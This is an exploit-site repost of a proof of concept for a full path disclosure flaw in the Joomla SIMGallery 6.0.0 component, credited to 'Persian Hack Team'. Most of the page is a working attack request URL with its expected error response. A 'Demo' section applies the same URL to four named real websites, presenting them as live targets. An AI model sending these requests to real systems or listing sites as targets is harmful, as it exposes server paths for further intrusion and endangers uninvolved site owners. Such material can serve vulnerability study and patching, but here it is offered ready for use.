Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017050130

Below is a copy:

Joomla Component SIMGallery 6.0.0 - Full Path Disclosure# Exploit Title: Joomla Component SIMGallery 6.0.0 - Full Path Disclosure
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Home : https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/simgallery/
# Home : http://persian-team.ir/
# Telegram Channel: @PersianHackTeam
# Tested on: Linux
# Date: 2017-05-18
 
# POC :
# Full Path Disclosure : 
https://www.target.com/index.php?option=com_simgallery&func=imagephp&tmpl=component&format=raw&image=/
And Response is : 
Error: requested file is not an accepted type:

#Demo : 
http://neurosurgic.com/index.php?option=com_simgallery&func=imagephp&tmpl=component&format=raw&image=/
http://sniperpitching.com/index.php?option=com_simgallery&func=imagephp&tmpl=component&format=raw&image=/
http://www.bitartean.net/index.php?option=com_simgallery&func=imagephp&tmpl=component&format=raw&image=/
http://www.demoiselles.eu/index.php?option=com_simgallery&func=imagephp&tmpl=component&format=raw&image=/

# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers

Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.